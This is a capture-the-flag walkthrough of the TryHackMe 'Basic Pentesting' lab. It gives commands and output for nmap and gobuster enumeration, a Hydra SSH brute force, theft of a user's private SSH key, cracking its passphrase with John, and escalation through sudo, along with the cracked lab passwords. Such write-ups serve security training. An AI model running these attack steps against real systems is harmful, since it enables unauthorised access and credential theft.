mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 13:20:18 +00:00
268 lines
No EOL
16 KiB
Markdown
268 lines
No EOL
16 KiB
Markdown
# TryHackMe-Basic Pentesting
|
|
|
|
>Abdullah Rizwan | 07:04 PM | 1st November , 2020
|
|
|
|
## NMAP
|
|
|
|
```
|
|
|
|
Nmap scan report for 10.10.207.136
|
|
Host is up (0.17s latency).
|
|
Not shown: 994 closed ports
|
|
PORT STATE SERVICE VERSION
|
|
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
|
|
| ssh-hostkey:
|
|
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|
|
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|
|
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
|
|
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
|
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
|
|_http-title: Site doesn't have a title (text/html).
|
|
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|
|
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
|
|
8009/tcp open ajp13?
|
|
| ajp-methods:
|
|
|_ Supported methods: GET HEAD POST OPTIONS
|
|
8080/tcp open http-proxy
|
|
| fingerprint-strings:
|
|
| ms-sql-s, oracle-tns:
|
|
| HTTP/1.1 400
|
|
| Content-Type: text/html;charset=utf-8
|
|
| Content-Language: en
|
|
| Content-Length: 2243
|
|
| Date: Sun, 01 Nov 2020 14:11:05 GMT
|
|
| Connection: close
|
|
| <!doctype html><html lang="en"><head><title>HTTP Status 400
|
|
|_ Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font
|
|
ily:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-c
|
|
olor:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;
|
|
color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name
|
|
{color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|
|
|_http-favicon: Apache Tomcat
|
|
|_http-title: Apache Tomcat/9.0.7
|
|
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
|
|
submit.cgi?new-service :
|
|
SF-Port8080-TCP:V=7.80%I=7%D=11/1%Time=5F9EC1F9%P=x86_64-pc-linux-gnu%r(or
|
|
SF:acle-tns,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charse
|
|
SF:t=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\
|
|
SF:x20Sun,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close
|
|
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
|
|
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
|
|
SF:xt/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgro
|
|
SF:und-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,s
|
|
SF:ans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x
|
|
SF:20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#52
|
|
SF:5D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;c
|
|
SF:olor:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,s
|
|
SF:ans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:T
|
|
SF:ahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x2
|
|
SF:0a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:
|
|
SF:1px;background-color:#525D76;border:none;}</style></head><bod")%r(ms-sq
|
|
SF:l-s,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf
|
|
SF:-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\x20Su
|
|
SF:n,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close\r\n\
|
|
SF:r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\x
|
|
SF:20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/cs
|
|
SF:s\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-c
|
|
SF:olor:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-s
|
|
SF:erif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x20{fo
|
|
:0{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;b
|
|
SF:ackground-color:#525D76;border:none;}</style></head><bod");
|
|
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
|
|
|
Host script results:
|
|
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|
|
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|
|
| smb-os-discovery:
|
|
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|
|
| Computer name: basic2
|
|
| NetBIOS computer name: BASIC2\x00
|
|
| Domain name: \x00
|
|
| FQDN: basic2
|
|
|_ System time: 2020-11-01T09:11:08-05:00
|
|
| smb-security-mode:
|
|
| account_used: guest
|
|
| authentication_level: user
|
|
| challenge_response: supported
|
|
|_ message_signing: disabled (dangerous, but default)
|
|
| smb2-security-mode:
|
|
| 2.02:
|
|
|_ Message signing enabled but not required
|
|
| smb2-time:
|
|
| date: 2020-11-01T14:11:08
|
|
|_ start_date: N/A
|
|
|
|
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
|
Nmap done: 1 IP address (1 host up) scanned in 167.02 seconds
|
|
|
|
```
|
|
|
|
## PORT 80
|
|
|
|
<img src="https://imgur.com/OLJ7xaK.png"/>
|
|
|
|
## PORT 8080
|
|
|
|
<img src="https://imgur.com/3V494fv.png"/>
|
|
|
|
## Smb Shares
|
|
|
|
Port 139 and 445 are open see lets see if we can access the samba shares
|
|
|
|
<img src="https://imgur.com/IT3LDqi.png"/>
|
|
|
|
<img src="https://imgur.com/EOVK7av.png"/>
|
|
|
|
From the `staff.txt` that we just grabbed , we can find two usernames `jan` and `kay`.
|
|
|
|
```
|
|
Announcement to staff:
|
|
|
|
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
|
|
this is how mistakes happen. (This means you too, Jan!)
|
|
|
|
-Kay
|
|
|
|
```
|
|
|
|
## Gobuster
|
|
|
|
Running gobuster we can find a directory `/development`
|
|
|
|
```
|
|
gobuster dir -u http://10.10.207.136/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
|
===============================================================
|
|
Gobuster v3.0.1
|
|
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
|
|
===============================================================
|
|
[+] Url: http://10.10.207.136/
|
|
[+] Threads: 10
|
|
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
|
[+] Status codes: 200,204,301,302,307,401,403
|
|
[+] User Agent: gobuster/3.0.1
|
|
[+] Timeout: 10s
|
|
===============================================================
|
|
2020/11/01 19:18:49 Starting gobuster
|
|
===============================================================
|
|
/development (Status: 301)
|
|
Progress: 3698 / 220561 (1.68%)^C
|
|
[!] Keyboard interrupt detected, terminating.
|
|
===============================================================
|
|
2020/11/01 19:20:02 Finished
|
|
===============================================================
|
|
|
|
```
|
|
|
|
<img src="https://imgur.com/Q0ItoLg.png"/>
|
|
|
|
`j.txt`
|
|
```
|
|
For J:
|
|
|
|
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
|
|
and I was able to crack your hash really easily. You know our password policy, so please follow
|
|
it? Change that password ASAP.
|
|
|
|
-K
|
|
|
|
```
|
|
|
|
`dev.txt`
|
|
|
|
```
|
|
|
|
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
|
|
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
|
|
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
|
|
using version 2.5.12, because other versions were giving me trouble. -K
|
|
|
|
2018-04-22: SMB has been configured. -K
|
|
|
|
2018-04-21: I got Apache set up. Will put in our content later. -J
|
|
|
|
```
|
|
## Hydra
|
|
|
|
Now jan is the username we found and it has a weak password so lets bruteforce it using hydra and we know that there is ssh runnin on the box so,
|
|
|
|
```
|
|
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.207.136
|
|
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
|
|
|
|
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 19:27:32
|
|
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
|
|
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
|
|
[DATA] attacking ssh://10.10.207.136:22/
|
|
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
|
|
|
|
t[STATUS] 112.00 tries/min, 336 tries in 00:03h, 14344063 to do in 2134:32h, 16 active
|
|
tt
|
|
[22][ssh] host: 10.10.207.136 login: jan password: armando
|
|
|
|
```
|
|
|
|
<img src="https://imgur.com/FLDBsrg.png"/>
|
|
|
|
Visti kay's home directory and there you can read `.ssh/id_rsa` private key for logging into ssh , send and receive it through netcat
|
|
|
|
<img src="https://imgur.com/WDpCcKJ.png"/>
|
|
|
|
But we still cannot login because that `id_rsa` is password protected
|
|
|
|
<img src="https://imgur.com/1KZChBk.png"/>
|
|
|
|
Use `ssh2john` to get hash of `id_rsa` file
|
|
|
|
```
|
|
root@kali:~/TryHackMe/Easy/BasicPentesting# /usr/share/john/ssh2john.py id_rsa > hash_for_id_rsa
|
|
```
|
|
Now run `john hash_for_id_rsa`
|
|
|
|
```
|
|
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
|
|
Proceeding with incremental:ASCII
|
|
0g 0:00:00:56 3/3 0g/s 2748Kp/s 2748Kc/s 2748KC/s pigr3sr..pigr0ts
|
|
0g 0:00:00:57 3/3 0g/s 2760Kp/s 2760Kc/s 2760KC/s jalyoun..jalyof4
|
|
0g 0:00:00:58 3/3 0g/s 2772Kp/s 2772Kc/s 2772KC/s 1llgod..1llgu1
|
|
0g 0:00:05:23 3/3 0g/s 2294Kp/s 2294Kc/s 2294KC/s fcp0luf..fcp0l46
|
|
0g 0:00:05:24 3/3 0g/s 2297Kp/s 2297Kc/s 2297KC/s nadah76..nadahro
|
|
0g 0:00:06:36 3/3 0g/s 2351Kp/s 2351Kc/s 2351KC/s gaudlsd..gaudsk3
|
|
0g 0:00:07:21 3/3 0g/s 2381Kp/s 2381Kc/s 2381KC/s civlup42..civl12mt
|
|
0g 0:00:07:22 3/3 0g/s 2384Kp/s 2384Kc/s 2384KC/s adiskak2..adiskuas
|
|
0g 0:00:09:14 3/3 0g/s 2527Kp/s 2527Kc/s 2527KC/s cornsexice..cornsexto1
|
|
0g 0:00:09:15 3/3 0g/s 2528Kp/s 2528Kc/s 2528KC/s cujkdc1..cujkdd4
|
|
0g 0:00:09:16 3/3 0g/s 2530Kp/s 2530Kc/s 2530KC/s bslhmf6..bslhm82
|
|
0g 0:00:09:17 3/3 0g/s 2532Kp/s 2532Kc/s 2532KC/s psyctiu..psyct29
|
|
0g 0:00:09:18 3/3 0g/s 2534Kp/s 2534Kc/s 2534KC/s tr00ge1..tr00gak
|
|
0g 0:00:09:19 3/3 0g/s 2536Kp/s 2536Kc/s 2536KC/s kmdufs1..kmduf6q
|
|
0g 0:00:12:52 3/3 0g/s 2458Kp/s 2458Kc/s 2458KC/s ecicos7..ecicots
|
|
0g 0:00:12:53 3/3 0g/s 2460Kp/s 2460Kc/s 2460KC/s eussce7..eussc14
|
|
0g 0:00:12:54 3/3 0g/s 2461Kp/s 2461Kc/s 2461KC/s exxza8f..exxzay!
|
|
0g 0:00:12:55 3/3 0g/s 2463Kp/s 2463Kc/s 2463KC/s eevzco5..eevzcuk
|
|
0g 0:00:12:56 3/3 0g/s 2464Kp/s 2464Kc/s 2464KC/s ublhl..ublni
|
|
0g 0:00:12:57 3/3 0g/s 2466Kp/s 2466Kc/s 2466KC/s 0zjnhb..0zjnd4
|
|
0g 0:00:12:58 3/3 0g/s 2467Kp/s 2467Kc/s 2467KC/s l4zb3n..l4zpay
|
|
0g 0:00:12:59 3/3 0g/s 2469Kp/s 2469Kc/s 2469KC/s hfu71s..hfu706
|
|
0g 0:00:13:01 3/3 0g/s 2471Kp/s 2471Kc/s 2471KC/s 4s18le..4s18cw
|
|
0g 0:00:13:02 3/3 0g/s 2473Kp/s 2473Kc/s 2473KC/s mcjau03..mcjau25
|
|
0g 0:00:13:03 3/3 0g/s 2474Kp/s 2474Kc/s 2474KC/s cim0cno..cim0c11
|
|
beeswax (id_rsa)
|
|
|
|
```
|
|
<img src="https://imgur.com/z0d6Xi2.png"/>
|
|
|
|
Now to become root we can run ALL commands
|
|
|
|
```
|
|
Matching Defaults entries for kay on basic2:
|
|
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
|
|
|
|
User kay may run the following commands on basic2:
|
|
(ALL : ALL) ALL
|
|
kay@basic2:~$
|
|
|
|
```
|
|
so `sudo bash`
|
|
|
|
|
|
<img src="https://imgur.com/SYNGX9N.png"/> |